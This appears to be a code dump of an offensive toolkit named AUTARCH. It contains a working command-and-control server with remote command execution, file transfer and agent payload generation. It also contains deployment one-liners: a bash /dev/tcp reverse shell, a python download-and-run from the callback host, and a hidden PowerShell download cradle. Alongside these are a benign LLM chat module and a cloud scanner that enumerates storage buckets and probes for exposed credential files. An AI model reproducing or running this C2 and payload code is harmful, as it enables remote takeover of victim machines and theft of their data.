    hostname: str = ''
    user: str = ''
    pid: int = 0
    arch: str = ''
    remote_addr: str = ''    # "ip:port" the agent connected from
    first_seen: str = ''     # ISO-8601 UTC timestamps
    last_seen: str = ''
    status: str = 'active'  # active, stale, dead
@dataclass
class Task:
    """A single queued unit of work for one agent."""
    id: str                  # short random hex id
    agent_id: str            # owning agent
    type: str                # 'exec' | 'download' | 'upload' | 'sysinfo' | 'exit'
    data: dict = field(default_factory=dict)   # type-specific payload
    status: str = 'pending'  # pending, sent, completed, failed
    result: Optional[dict] = None              # agent's response, once received
    created_at: str = ''     # ISO-8601 UTC timestamps
    completed_at: str = ''
class C2Server:
    """Multi-session C2 server with agent management.

    Keeps in-memory registries of listeners, connected agents and queued
    tasks. Each listener runs an accept loop on a daemon thread; every
    accepted agent connection gets its own handler thread that pushes
    pending tasks to the agent and collects results synchronously.
    Generated agent payloads are written under <data>/c2.
    """
    def __init__(self):
        # On-disk workspace for generated agent payloads: <data>/c2
        self._data_dir = os.path.join(get_data_dir(), 'c2')
        os.makedirs(self._data_dir, exist_ok=True)
        self._agents: Dict[str, Agent] = {}
        self._tasks: Dict[str, Task] = {}
        self._agent_tasks: Dict[str, list] = {}  # agent_id -> [task_ids]
        self._agent_sockets: Dict[str, socket.socket] = {}
        self._listeners: Dict[str, dict] = {}
        self._listener_threads: Dict[str, threading.Thread] = {}
        self._stop_events: Dict[str, threading.Event] = {}
    # ── Listener Management ───────────────────────────────────────────────
    def start_listener(self, name: str, host: str = '0.0.0.0',
                       port: int = 4444, protocol: str = 'tcp') -> dict:
        """Start a C2 listener.

        Spawns a daemon accept-loop thread bound to host:port; each
        accepted connection is handed to _handle_agent() on its own
        thread. Returns {'ok': True, 'message': ...} or an error dict.
        """
        if name in self._listeners:
            return {'ok': False, 'error': f'Listener "{name}" already exists'}
        stop_event = threading.Event()
        self._stop_events[name] = stop_event
        listener_info = {
            'name': name, 'host': host, 'port': port, 'protocol': protocol,
            'started_at': datetime.now(timezone.utc).isoformat(),
            'connections': 0,
        }
        self._listeners[name] = listener_info
        def accept_loop():
            # Runs on a daemon thread until stop_event is set.
            try:
                srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                # Short accept timeout so the loop can poll stop_event.
                srv.settimeout(2.0)
                srv.bind((host, port))
                srv.listen(20)
                # Stash the socket so stop_listener() can force-close it.
                listener_info['socket'] = srv
                while not stop_event.is_set():
                    try:
                        conn, addr = srv.accept()
                        listener_info['connections'] += 1
                        threading.Thread(target=self._handle_agent,
                                         args=(conn, addr, name),
                                         daemon=True).start()
                    except socket.timeout:
                        continue
                    except Exception:
                        break
            except Exception as e:
                # Bind/listen failures surface via the listener record.
                listener_info['error'] = str(e)
            finally:
                try:
                    srv.close()
                except Exception:
                    pass
        t = threading.Thread(target=accept_loop, daemon=True)
        t.start()
        self._listener_threads[name] = t
        return {'ok': True, 'message': f'Listener "{name}" started on {host}:{port}'}
    def stop_listener(self, name: str) -> dict:
        """Stop a C2 listener (signals the thread and closes its socket)."""
        if name not in self._listeners:
            return {'ok': False, 'error': 'Listener not found'}
        stop_event = self._stop_events.pop(name, None)
        if stop_event:
            stop_event.set()
        listener = self._listeners.pop(name, {})
        sock = listener.get('socket')
        if sock:
            try:
                sock.close()
            except Exception:
                pass
        self._listener_threads.pop(name, None)
        return {'ok': True, 'message': f'Listener "{name}" stopped'}
    def list_listeners(self) -> List[dict]:
        """Return listener records, stripping the raw socket objects."""
        return [{k: v for k, v in l.items() if k != 'socket'}
                for l in self._listeners.values()]
    def _handle_agent(self, conn: socket.socket, addr: tuple, listener: str):
        """Handle an incoming agent connection for its whole lifetime.

        Expects a JSON 'register' message first, then loops: pushing each
        pending task and synchronously waiting for its result.
        """
        conn.settimeout(300)  # 5 min timeout
        try:
            data = conn.recv(65536)
            if not data:
                return
            msg = json.loads(data.decode().strip())
            # Anything other than a registration is dropped immediately.
            if msg.get('type') != 'register':
                conn.close()
                return
            info = msg.get('data', {})
            agent_id = info.get('id', secrets.token_hex(4))
            agent = Agent(
                id=agent_id,
                os=info.get('os', ''),
                hostname=info.get('hostname', ''),
                user=info.get('user', ''),
                pid=info.get('pid', 0),
                arch=info.get('arch', ''),
                remote_addr=f'{addr[0]}:{addr[1]}',
                first_seen=datetime.now(timezone.utc).isoformat(),
                last_seen=datetime.now(timezone.utc).isoformat(),
            )
            self._agents[agent_id] = agent
            self._agent_sockets[agent_id] = conn
            if agent_id not in self._agent_tasks:
                self._agent_tasks[agent_id] = []
            # Process pending tasks for this agent
            while True:
                pending = [t for t in self._get_pending_tasks(agent_id)]
                if not pending:
                    time.sleep(1)
                    # Zero-byte send as a cheap liveness probe.
                    # NOTE(review): this may not detect every half-dead
                    # connection — confirm behavior on target platforms.
                    try:
                        conn.send(b'')
                    except Exception:
                        break
                    agent.last_seen = datetime.now(timezone.utc).isoformat()
                    continue
                for task in pending:
                    try:
                        cmd = {'type': task.type, 'task_id': task.id, **task.data}
                        conn.send(json.dumps(cmd).encode() + b'\n')
                        task.status = 'sent'
                        # Wait for result
                        # NOTE(review): this settimeout(60) also applies to
                        # all subsequent recv calls on this socket.
                        conn.settimeout(60)
                        result_data = conn.recv(65536)
                        if result_data:
                            result = json.loads(result_data.decode().strip())
                            task.result = result
                            task.status = 'completed'
                            task.completed_at = datetime.now(timezone.utc).isoformat()
                        else:
                            task.status = 'failed'
                    except Exception as e:
                        task.status = 'failed'
                        task.result = {'error': str(e)}
                agent.last_seen = datetime.now(timezone.utc).isoformat()
        except Exception:
            pass
        finally:
            conn.close()
            # Mark agent as stale if no longer connected
            for aid, sock in list(self._agent_sockets.items()):
                if sock is conn:
                    self._agent_sockets.pop(aid, None)
                    if aid in self._agents:
                        self._agents[aid].status = 'stale'
    def _get_pending_tasks(self, agent_id: str) -> List[Task]:
        """Return this agent's tasks that are still in 'pending' state."""
        task_ids = self._agent_tasks.get(agent_id, [])
        return [self._tasks[tid] for tid in task_ids
                if tid in self._tasks and self._tasks[tid].status == 'pending']
    # ── Agent Management ──────────────────────────────────────────────────
    def list_agents(self) -> List[dict]:
        """Return all known agents; live-socket presence overrides status."""
        agents = []
        for a in self._agents.values():
            # Check if still connected
            connected = a.id in self._agent_sockets
            agents.append({
                'id': a.id, 'os': a.os, 'hostname': a.hostname,
                'user': a.user, 'pid': a.pid, 'arch': a.arch,
                'remote_addr': a.remote_addr,
                'first_seen': a.first_seen, 'last_seen': a.last_seen,
                'status': 'active' if connected else a.status,
            })
        return agents
    def remove_agent(self, agent_id: str) -> dict:
        """Drop an agent: close its socket and forget its tasks."""
        if agent_id in self._agent_sockets:
            try:
                self._agent_sockets[agent_id].close()
            except Exception:
                pass
            del self._agent_sockets[agent_id]
        self._agents.pop(agent_id, None)
        self._agent_tasks.pop(agent_id, None)
        return {'ok': True}
    # ── Task Queue ────────────────────────────────────────────────────────
    def queue_task(self, agent_id: str, task_type: str,
                   data: dict = None) -> dict:
        """Queue a task for an agent; its handler thread delivers it."""
        if agent_id not in self._agents:
            return {'ok': False, 'error': 'Agent not found'}
        task_id = secrets.token_hex(4)
        task = Task(
            id=task_id,
            agent_id=agent_id,
            type=task_type,
            data=data or {},
            created_at=datetime.now(timezone.utc).isoformat(),
        )
        self._tasks[task_id] = task
        if agent_id not in self._agent_tasks:
            self._agent_tasks[agent_id] = []
        self._agent_tasks[agent_id].append(task_id)
        return {'ok': True, 'task_id': task_id}
    def execute_command(self, agent_id: str, command: str) -> dict:
        """Shortcut to queue an exec task."""
        return self.queue_task(agent_id, 'exec', {'command': command})
    def download_file(self, agent_id: str, remote_path: str) -> dict:
        """Queue a download task (agent reads the file, returns base64)."""
        return self.queue_task(agent_id, 'download', {'path': remote_path})
    def upload_file(self, agent_id: str, remote_path: str,
                    file_data: bytes) -> dict:
        """Queue an upload task (file bytes are base64-encoded inline)."""
        encoded = base64.b64encode(file_data).decode()
        return self.queue_task(agent_id, 'upload',
                               {'path': remote_path, 'data': encoded})
    def get_task_result(self, task_id: str) -> dict:
        """Return a task's current status and (if completed) its result."""
        task = self._tasks.get(task_id)
        if not task:
            return {'ok': False, 'error': 'Task not found'}
        return {
            'ok': True,
            'task_id': task.id,
            'status': task.status,
            'result': task.result,
            'created_at': task.created_at,
            'completed_at': task.completed_at,
        }
    def list_tasks(self, agent_id: str = '') -> List[dict]:
        """List tasks, optionally filtered to one agent."""
        tasks = []
        for t in self._tasks.values():
            if agent_id and t.agent_id != agent_id:
                continue
            tasks.append({
                'id': t.id, 'agent_id': t.agent_id, 'type': t.type,
                'status': t.status, 'created_at': t.created_at,
                'completed_at': t.completed_at,
                'has_result': t.result is not None,
            })
        return tasks
    # ── Agent Generation ──────────────────────────────────────────────────
    def generate_agent(self, host: str, port: int = 4444,
                       agent_type: str = 'python',
                       interval: int = 5, jitter: int = 2) -> dict:
        """Generate a C2 agent payload.

        Renders the matching template (python/bash/powershell) with the
        callback host/port and a fresh agent id, and writes it under the
        data directory. Returns the code plus the saved file path.
        """
        agent_id = secrets.token_hex(4)
        if agent_type == 'python':
            code = PYTHON_AGENT_TEMPLATE.format(
                host=host, port=port, interval=interval,
                jitter=jitter, agent_id=agent_id)
        elif agent_type == 'bash':
            code = BASH_AGENT_TEMPLATE.format(
                host=host, port=port, interval=interval,
                agent_id=agent_id)
        elif agent_type == 'powershell':
            code = POWERSHELL_AGENT_TEMPLATE.format(
                host=host, port=port, interval=interval,
                agent_id=agent_id)
        else:
            return {'ok': False, 'error': f'Unknown agent type: {agent_type}'}
        # Save to file
        ext = {'python': 'py', 'bash': 'sh', 'powershell': 'ps1'}[agent_type]
        filename = f'agent_{agent_id}.{ext}'
        filepath = os.path.join(self._data_dir, filename)
        with open(filepath, 'w') as f:
            f.write(code)
        return {
            'ok': True,
            'agent_id': agent_id,
            'filename': filename,
            'filepath': filepath,
            'code': code,
            'type': agent_type,
        }
    # ── One-liners ────────────────────────────────────────────────────────
    def get_oneliner(self, host: str, port: int = 4444,
                     agent_type: str = 'python') -> dict:
        """Generate a one-liner to deploy the agent.

        NOTE: python/powershell variants fetch the payload from an HTTP
        server on port+1; serving that file is up to the operator.
        """
        if agent_type == 'python':
            liner = (f"python3 -c \"import urllib.request,os,tempfile;"
                     f"f=tempfile.NamedTemporaryFile(suffix='.py',delete=False);"
                     f"f.write(urllib.request.urlopen('http://{host}:{port+1}/agent.py').read());"
                     f"f.close();os.system('python3 '+f.name+' &')\"")
        elif agent_type == 'bash':
            liner = f"bash -c 'bash -i >& /dev/tcp/{host}/{port} 0>&1 &'"
        elif agent_type == 'powershell':
            liner = (f"powershell -nop -w hidden -c "
                     f"\"IEX(New-Object Net.WebClient).DownloadString"
                     f"('http://{host}:{port+1}/agent.ps1')\"")
        else:
            return {'ok': False, 'error': 'Unknown type'}
        return {'ok': True, 'oneliner': liner, 'type': agent_type}
# ── Singleton ─────────────────────────────────────────────────────────────────
# Process-wide singleton, guarded for concurrent first use.
_instance = None
_lock = threading.Lock()


def get_c2_server() -> C2Server:
    """Return the shared C2Server, creating it thread-safely on demand."""
    global _instance
    if _instance is not None:
        return _instance
    with _lock:
        # Re-check inside the lock: another thread may have constructed
        # the server while we were waiting (double-checked locking).
        if _instance is None:
            _instance = C2Server()
    return _instance
# ── CLI ───────────────────────────────────────────────────────────────────────
def _prompt_int(prompt: str, default: int) -> int:
    """Read an integer from stdin; blank or invalid input returns ``default``."""
    raw = input(prompt).strip()
    if not raw:
        return default
    try:
        return int(raw)
    except ValueError:
        print(f" Invalid number, using {default}")
        return default


def run():
    """Interactive CLI for C2 Framework.

    Simple blocking menu loop; returns when the user picks 0.
    """
    svc = get_c2_server()
    while True:
        print("\n╔═══════════════════════════════════════╗")
        print("║ C2 FRAMEWORK ║")
        print("╠═══════════════════════════════════════╣")
        print("║ 1 — Start Listener ║")
        print("║ 2 — Stop Listener ║")
        print("║ 3 — List Agents ║")
        print("║ 4 — Interact with Agent ║")
        print("║ 5 — Generate Agent Payload ║")
        print("║ 6 — Get One-Liner ║")
        print("║ 0 — Back ║")
        print("╚═══════════════════════════════════════╝")
        choice = input("\n Select: ").strip()
        if choice == '0':
            break
        elif choice == '1':
            name = input(" Listener name: ").strip() or 'default'
            # Invalid input no longer crashes the menu (bare int() used
            # to raise ValueError straight to the caller).
            port = _prompt_int(" Port (4444): ", 4444)
            r = svc.start_listener(name, port=port)
            print(f" {r.get('message', r.get('error', ''))}")
        elif choice == '2':
            listeners = svc.list_listeners()
            if not listeners:
                print(" No listeners.")
                continue
            for l in listeners:
                # Separator restored: name and host:port used to run together.
                print(f" {l['name']} → {l['host']}:{l['port']} ({l['connections']} connections)")
            name = input(" Stop which: ").strip()
            if name:
                r = svc.stop_listener(name)
                print(f" {r.get('message', r.get('error', ''))}")
        elif choice == '3':
            agents = svc.list_agents()
            if not agents:
                print(" No agents.")
                continue
            for a in agents:
                print(f" [{a['status']:6s}] {a['id']} → {a['user']}@{a['hostname']} "
                      f"({a['os']}) from {a['remote_addr']}")
        elif choice == '4':
            aid = input(" Agent ID: ").strip()
            if not aid:
                continue
            print(f" Interacting with {aid} (type 'exit' to return)")
            while True:
                cmd = input(f" [{aid}]> ").strip()
                if cmd in ('exit', 'quit', ''):
                    break
                r = svc.execute_command(aid, cmd)
                if not r.get('ok'):
                    print(f" Error: {r.get('error')}")
                    continue
                # Poll for result (the handler thread fills it in)
                for _ in range(30):
                    time.sleep(1)
                    result = svc.get_task_result(r['task_id'])
                    if result.get('status') in ('completed', 'failed'):
                        if result.get('result'):
                            out = result['result'].get('stdout', '')
                            err = result['result'].get('stderr', '')
                            if out:
                                print(out)
                            if err:
                                print(f" [stderr] {err}")
                        break
                else:
                    print(" [timeout] No response within 30s")
        elif choice == '5':
            host = input(" Callback host: ").strip()
            port = _prompt_int(" Callback port (4444): ", 4444)
            atype = input(" Type (python/bash/powershell): ").strip() or 'python'
            r = svc.generate_agent(host, port, atype)
            if r.get('ok'):
                print(f" Agent saved to: {r['filepath']}")
            else:
                print(f" Error: {r.get('error')}")
        elif choice == '6':
            host = input(" Host: ").strip()
            port = _prompt_int(" Port (4444): ", 4444)
            atype = input(" Type (python/bash/powershell): ").strip() or 'python'
            r = svc.get_oneliner(host, port, atype)
            if r.get('ok'):
                print(f"\n {r['oneliner']}\n")

270
modules/chat.py Normal file
View File

@@ -0,0 +1,270 @@
"""
AUTARCH Chat Module
Interactive chat interface for the LLM
This module provides a command-line chat interface to interact with the loaded model.
"""
import sys
from pathlib import Path
# Module metadata
DESCRIPTION = "Interactive chat with the LLM"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "core"
# Add parent directory to path
sys.path.insert(0, str(Path(__file__).parent.parent))
from core.llm import get_llm, LLMError
from core.banner import Colors, clear_screen, display_banner
class ChatInterface:
"""Interactive chat interface for AUTARCH LLM."""
COMMANDS = {
'/help': 'Show available commands',
'/clear': 'Clear conversation history',
'/history': 'Show conversation history',
'/info': 'Show model information',
'/system': 'Set system prompt (e.g., /system You are a helpful assistant)',
'/temp': 'Set temperature (e.g., /temp 0.8)',
'/tokens': 'Set max tokens (e.g., /tokens 1024)',
'/stream': 'Toggle streaming mode',
'/exit': 'Exit chat',
}
    def __init__(self):
        # Shared LLM wrapper (loaded lazily by core.llm).
        self.llm = get_llm()
        # Default persona; replaceable at runtime via /system.
        self.system_prompt = "You are AUTARCH, an AI assistant created by darkHal and Setec Security Labs. You are helpful, knowledgeable, and direct in your responses."
        # Stream tokens as they arrive (toggled with /stream).
        self.streaming = True
        # None means "use the model's configured defaults"
        # (/temp and /tokens set per-session overrides).
        self.temp_override = None
        self.tokens_override = None
def print_status(self, message: str, status: str = "info"):
"""Print a status message."""
colors = {"info": Colors.CYAN, "success": Colors.GREEN, "warning": Colors.YELLOW, "error": Colors.RED}
symbols = {"info": "*", "success": "+", "warning": "!", "error": "X"}
print(f"{colors.get(status, Colors.WHITE)}[{symbols.get(status, '*')}] {message}{Colors.RESET}")
    def print_help(self):
        """Display the slash-command reference table."""
        print(f"\n{Colors.BOLD}{Colors.WHITE}Available Commands:{Colors.RESET}")
        # NOTE(review): '' * 50 prints nothing — the separator glyph
        # (likely '─') appears lost in transit; confirm against upstream.
        print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
        for cmd, desc in self.COMMANDS.items():
            print(f" {Colors.CYAN}{cmd:12}{Colors.RESET} {desc}")
        print()
def print_history(self):
"""Display conversation history."""
history = self.llm.get_history()
if not history:
self.print_status("No conversation history", "info")
return
print(f"\n{Colors.BOLD}{Colors.WHITE}Conversation History:{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
for msg in history:
role = msg['role']
content = msg['content']
if role == 'system':
print(f"\n{Colors.MAGENTA}[System]{Colors.RESET}")
print(f" {Colors.DIM}{content[:100]}...{Colors.RESET}" if len(content) > 100 else f" {Colors.DIM}{content}{Colors.RESET}")
elif role == 'user':
print(f"\n{Colors.GREEN}[You]{Colors.RESET}")
print(f" {content}")
elif role == 'assistant':
print(f"\n{Colors.CYAN}[AUTARCH]{Colors.RESET}")
# Truncate long responses in history view
if len(content) > 200:
print(f" {content[:200]}...")
else:
print(f" {content}")
print()
def print_model_info(self):
"""Display model information."""
info = self.llm.get_model_info()
print(f"\n{Colors.BOLD}{Colors.WHITE}Model Information:{Colors.RESET}")
print(f"{Colors.DIM}{'' * 50}{Colors.RESET}")
if info['loaded']:
print(f" {Colors.CYAN}Model:{Colors.RESET} {info['model_name']}")
print(f" {Colors.CYAN}Context Size:{Colors.RESET} {info['n_ctx']}")
print(f" {Colors.CYAN}Vocabulary:{Colors.RESET} {info['n_vocab']}")
print(f" {Colors.CYAN}Streaming:{Colors.RESET} {'Enabled' if self.streaming else 'Disabled'}")
if self.temp_override:
print(f" {Colors.CYAN}Temperature:{Colors.RESET} {self.temp_override} (override)")
if self.tokens_override:
print(f" {Colors.CYAN}Max Tokens:{Colors.RESET} {self.tokens_override} (override)")
else:
print(f" {Colors.YELLOW}No model loaded{Colors.RESET}")
print()
def handle_command(self, command: str) -> bool:
"""Handle a chat command.
Args:
command: The command string.
Returns:
True if should continue chat, False if should exit.
"""
parts = command.split(maxsplit=1)
cmd = parts[0].lower()
args = parts[1] if len(parts) > 1 else ""
if cmd == '/help':
self.print_help()
elif cmd == '/clear':
self.llm.clear_history()
self.print_status("Conversation history cleared", "success")
elif cmd == '/history':
self.print_history()
elif cmd == '/info':
self.print_model_info()
elif cmd == '/system':
if args:
self.system_prompt = args
self.llm.clear_history() # Clear history when changing system prompt
self.print_status(f"System prompt set: {args[:50]}...", "success")
else:
print(f" {Colors.CYAN}Current:{Colors.RESET} {self.system_prompt}")
elif cmd == '/temp':
if args:
try:
temp = float(args)
if 0.0 <= temp <= 2.0:
self.temp_override = temp
self.print_status(f"Temperature set to {temp}", "success")
else:
self.print_status("Temperature must be between 0.0 and 2.0", "error")
except ValueError:
self.print_status("Invalid temperature value", "error")
else:
self.print_status(f"Current temperature: {self.temp_override or 'default'}", "info")
elif cmd == '/tokens':
if args:
try:
tokens = int(args)
if tokens > 0:
self.tokens_override = tokens
self.print_status(f"Max tokens set to {tokens}", "success")
else:
self.print_status("Max tokens must be positive", "error")
except ValueError:
self.print_status("Invalid token value", "error")
else:
self.print_status(f"Current max tokens: {self.tokens_override or 'default'}", "info")
elif cmd == '/stream':
self.streaming = not self.streaming
self.print_status(f"Streaming {'enabled' if self.streaming else 'disabled'}", "success")
elif cmd in ['/exit', '/quit', '/q']:
return False
else:
self.print_status(f"Unknown command: {cmd}. Type /help for commands.", "warning")
return True
def chat_loop(self):
"""Main chat loop."""
print(f"\n{Colors.GREEN}[+] Chat started. Type /help for commands, /exit to quit.{Colors.RESET}")
print(f"{Colors.DIM}{'' * 60}{Colors.RESET}\n")
while True:
try:
# Get user input
user_input = input(f"{Colors.GREEN}You:{Colors.RESET} ").strip()
if not user_input:
continue
# Handle commands
if user_input.startswith('/'):
if not self.handle_command(user_input):
break
continue
# Generate response
print(f"\n{Colors.CYAN}AUTARCH:{Colors.RESET} ", end="", flush=True)
kwargs = {}
if self.temp_override is not None:
kwargs['temperature'] = self.temp_override
if self.tokens_override is not None:
kwargs['max_tokens'] = self.tokens_override
try:
if self.streaming:
# Streaming response
for token in self.llm.chat(
user_input,
system_prompt=self.system_prompt,
stream=True,
**kwargs
):
print(token, end="", flush=True)
print("\n")
else:
# Non-streaming response
response = self.llm.chat(
user_input,
system_prompt=self.system_prompt,
stream=False,
**kwargs
)
print(f"{response}\n")
except LLMError as e:
print()
self.print_status(f"Generation error: {e}", "error")
except (EOFError, KeyboardInterrupt):
print(f"\n\n{Colors.CYAN}Chat ended.{Colors.RESET}")
break
def run(self):
"""Run the chat interface."""
clear_screen()
display_banner()
print(f"{Colors.BOLD}{Colors.WHITE} AUTARCH Chat Interface{Colors.RESET}")
print(f"{Colors.DIM} {'' * 50}{Colors.RESET}")
# Check if model is loaded
if not self.llm.is_loaded:
self.print_status("Loading model...", "info")
try:
self.llm.load_model(verbose=True)
except LLMError as e:
self.print_status(f"Failed to load model: {e}", "error")
self.print_status("Please run setup to configure a model.", "warning")
return
self.print_model_info()
self.chat_loop()
def run():
    """Module entry point: construct the chat UI and hand over control."""
    ChatInterface().run()
# Allow running this module directly as a standalone script.
if __name__ == "__main__":
    run()

448
modules/cloud_scan.py Normal file
View File

@@ -0,0 +1,448 @@
"""AUTARCH Cloud Security Scanner
AWS/Azure/GCP bucket enumeration, IAM misconfiguration detection, exposed
service scanning, and cloud resource discovery.
"""
DESCRIPTION = "Cloud infrastructure security scanning"
AUTHOR = "darkHal"
VERSION = "1.0"
CATEGORY = "offense"
import os
import re
import json
import time
import threading
from pathlib import Path
from typing import Dict, List, Optional, Any
try:
    from core.paths import get_data_dir
except ImportError:
    # Fallback when run outside the AUTARCH package: use ./data next to modules/.
    def get_data_dir():
        return str(Path(__file__).parent.parent / 'data')
try:
    import requests
    HAS_REQUESTS = True
except ImportError:
    # requests is optional; network-dependent scanners no-op when it is absent.
    HAS_REQUESTS = False
# ── Cloud Provider Endpoints ─────────────────────────────────────────────────
# Common AWS regions.
# NOTE(review): AWS_REGIONS is not referenced anywhere in this file's visible
# code — confirm whether it is used elsewhere or is dead data.
AWS_REGIONS = [
    'us-east-1', 'us-east-2', 'us-west-1', 'us-west-2',
    'eu-west-1', 'eu-west-2', 'eu-central-1',
    'ap-southeast-1', 'ap-southeast-2', 'ap-northeast-1',
]
# Generic bucket-name words combined with the target keyword during enumeration.
COMMON_BUCKET_NAMES = [
    'backup', 'backups', 'data', 'dev', 'staging', 'prod', 'production',
    'logs', 'assets', 'media', 'uploads', 'images', 'static', 'public',
    'private', 'internal', 'config', 'configs', 'db', 'database',
    'archive', 'old', 'temp', 'tmp', 'test', 'debug', 'admin',
    'www', 'web', 'api', 'app', 'mobile', 'docs', 'documents',
    'reports', 'export', 'import', 'share', 'shared',
]
# Link-local / internal instance-metadata services per provider; reachability
# from inside an app indicates potential SSRF exposure.
METADATA_ENDPOINTS = {
    'aws': 'http://169.254.169.254/latest/meta-data/',
    'gcp': 'http://metadata.google.internal/computeMetadata/v1/',
    'azure': 'http://169.254.169.254/metadata/instance?api-version=2021-02-01',
    'digitalocean': 'http://169.254.169.254/metadata/v1/',
}
# ── Cloud Scanner ────────────────────────────────────────────────────────────
class CloudScanner:
    """Cloud infrastructure security scanner.

    Bucket/blob enumeration runs on daemon background threads; each job is
    tracked in self._jobs keyed by job_id, and callers poll get_job() until
    status == 'complete'.
    """
    def __init__(self):
        # Per-module results directory under the app data dir.
        self.data_dir = os.path.join(get_data_dir(), 'cloud_scan')
        os.makedirs(self.data_dir, exist_ok=True)
        self.results: List[Dict] = []
        # job_id -> {'type', 'status', 'found', 'checked', 'total'}
        self._jobs: Dict[str, Dict] = {}
    # ── S3 Bucket Enumeration ────────────────────────────────────────────
    def enum_s3_buckets(self, keyword: str, prefixes: List[str] = None,
                        suffixes: List[str] = None) -> str:
        """Enumerate S3 buckets with naming permutations.

        Args:
            keyword: Target name to permute (company/product name).
            prefixes/suffixes: Optional override lists; defaults cover
                common environment decorations (dev-, -backup, ...).
        Returns:
            job_id for polling via get_job(), or '' if requests is missing.
        """
        if not HAS_REQUESTS:
            return ''
        job_id = f's3enum_{int(time.time())}'
        self._jobs[job_id] = {
            'type': 's3_enum', 'status': 'running',
            'found': [], 'checked': 0, 'total': 0
        }
        def _enum():
            prefixes_list = prefixes or ['', 'dev-', 'staging-', 'prod-', 'test-', 'backup-']
            suffixes_list = suffixes or ['', '-backup', '-data', '-assets', '-logs', '-dev',
                                         '-staging', '-prod', '-public', '-private']
            bucket_names = set()
            for pfx in prefixes_list:
                for sfx in suffixes_list:
                    bucket_names.add(f'{pfx}{keyword}{sfx}')
            # Add common patterns (keyword-data, data-keyword, ...)
            for common in COMMON_BUCKET_NAMES:
                bucket_names.add(f'{keyword}-{common}')
                bucket_names.add(f'{common}-{keyword}')
            self._jobs[job_id]['total'] = len(bucket_names)
            found = []
            for name in bucket_names:
                try:
                    # HEAD distinguishes 200 (public) from 403 (exists, private).
                    url = f'https://{name}.s3.amazonaws.com'
                    resp = requests.head(url, timeout=5, allow_redirects=True)
                    self._jobs[job_id]['checked'] += 1
                    if resp.status_code == 200:
                        # Try listing the bucket contents to confirm exposure.
                        list_resp = requests.get(url, timeout=5)
                        listable = '<ListBucketResult' in list_resp.text
                        found.append({
                            'bucket': name, 'provider': 'aws',
                            'url': url, 'status': resp.status_code,
                            'listable': listable, 'public': True
                        })
                    elif resp.status_code == 403:
                        found.append({
                            'bucket': name, 'provider': 'aws',
                            'url': url, 'status': 403,
                            'listable': False, 'public': False,
                            'exists': True
                        })
                except Exception:
                    # Network errors still count toward progress.
                    self._jobs[job_id]['checked'] += 1
            self._jobs[job_id]['found'] = found
            self._jobs[job_id]['status'] = 'complete'
        threading.Thread(target=_enum, daemon=True).start()
        return job_id
    # ── GCS Bucket Enumeration ───────────────────────────────────────────
    def enum_gcs_buckets(self, keyword: str) -> str:
        """Enumerate Google Cloud Storage buckets. Returns job_id ('' if requests missing)."""
        if not HAS_REQUESTS:
            return ''
        job_id = f'gcsenum_{int(time.time())}'
        self._jobs[job_id] = {
            'type': 'gcs_enum', 'status': 'running',
            'found': [], 'checked': 0, 'total': 0
        }
        def _enum():
            names = set()
            for suffix in ['', '-data', '-backup', '-assets', '-staging', '-prod', '-dev', '-logs']:
                names.add(f'{keyword}{suffix}')
            self._jobs[job_id]['total'] = len(names)
            found = []
            for name in names:
                try:
                    url = f'https://storage.googleapis.com/{name}'
                    resp = requests.head(url, timeout=5)
                    self._jobs[job_id]['checked'] += 1
                    # 200 = publicly readable; 403 = exists but access denied.
                    if resp.status_code in (200, 403):
                        found.append({
                            'bucket': name, 'provider': 'gcp',
                            'url': url, 'status': resp.status_code,
                            'public': resp.status_code == 200
                        })
                except Exception:
                    self._jobs[job_id]['checked'] += 1
            self._jobs[job_id]['found'] = found
            self._jobs[job_id]['status'] = 'complete'
        threading.Thread(target=_enum, daemon=True).start()
        return job_id
    # ── Azure Blob Enumeration ───────────────────────────────────────────
    def enum_azure_blobs(self, keyword: str) -> str:
        """Enumerate Azure Blob Storage containers. Returns job_id ('' if requests missing)."""
        if not HAS_REQUESTS:
            return ''
        job_id = f'azureenum_{int(time.time())}'
        self._jobs[job_id] = {
            'type': 'azure_enum', 'status': 'running',
            'found': [], 'checked': 0, 'total': 0
        }
        def _enum():
            # Storage account names derived from the keyword.
            accounts = [keyword, f'{keyword}storage', f'{keyword}data',
                        f'{keyword}backup', f'{keyword}dev', f'{keyword}prod']
            containers = ['$web', 'data', 'backup', 'uploads', 'assets',
                          'logs', 'public', 'media', 'images']
            total = len(accounts) * len(containers)
            self._jobs[job_id]['total'] = total
            found = []
            for account in accounts:
                for container in containers:
                    try:
                        # comp=list only succeeds on anonymously listable containers.
                        url = f'https://{account}.blob.core.windows.net/{container}?restype=container&comp=list'
                        resp = requests.get(url, timeout=5)
                        self._jobs[job_id]['checked'] += 1
                        if resp.status_code == 200:
                            found.append({
                                'account': account, 'container': container,
                                'provider': 'azure', 'url': url,
                                'status': resp.status_code, 'public': True
                            })
                        elif resp.status_code == 403:
                            found.append({
                                'account': account, 'container': container,
                                'provider': 'azure', 'url': url,
                                'status': 403, 'exists': True, 'public': False
                            })
                    except Exception:
                        self._jobs[job_id]['checked'] += 1
            self._jobs[job_id]['found'] = found
            self._jobs[job_id]['status'] = 'complete'
        threading.Thread(target=_enum, daemon=True).start()
        return job_id
    # ── Exposed Services ─────────────────────────────────────────────────
    def scan_exposed_services(self, target: str) -> Dict:
        """Check for commonly exposed cloud services on a target.

        Probes well-known paths (config files, admin panels, debug endpoints)
        and flags 200 responses whose body contains credential-like keywords.
        """
        if not HAS_REQUESTS:
            return {'ok': False, 'error': 'requests not available'}
        services = []
        checks = [
            ('/server-status', 'Apache Status'),
            ('/nginx_status', 'Nginx Status'),
            ('/.env', 'Environment File'),
            ('/.git/config', 'Git Config'),
            ('/.aws/credentials', 'AWS Credentials'),
            ('/wp-config.php.bak', 'WordPress Config Backup'),
            ('/phpinfo.php', 'PHP Info'),
            ('/debug', 'Debug Endpoint'),
            ('/actuator', 'Spring Actuator'),
            ('/actuator/env', 'Spring Env'),
            ('/api/swagger.json', 'Swagger/OpenAPI Spec'),
            ('/.well-known/security.txt', 'Security Policy'),
            ('/robots.txt', 'Robots.txt'),
            ('/sitemap.xml', 'Sitemap'),
            ('/graphql', 'GraphQL Endpoint'),
            ('/console', 'Console'),
            ('/admin', 'Admin Panel'),
            ('/wp-admin', 'WordPress Admin'),
            ('/phpmyadmin', 'phpMyAdmin'),
        ]
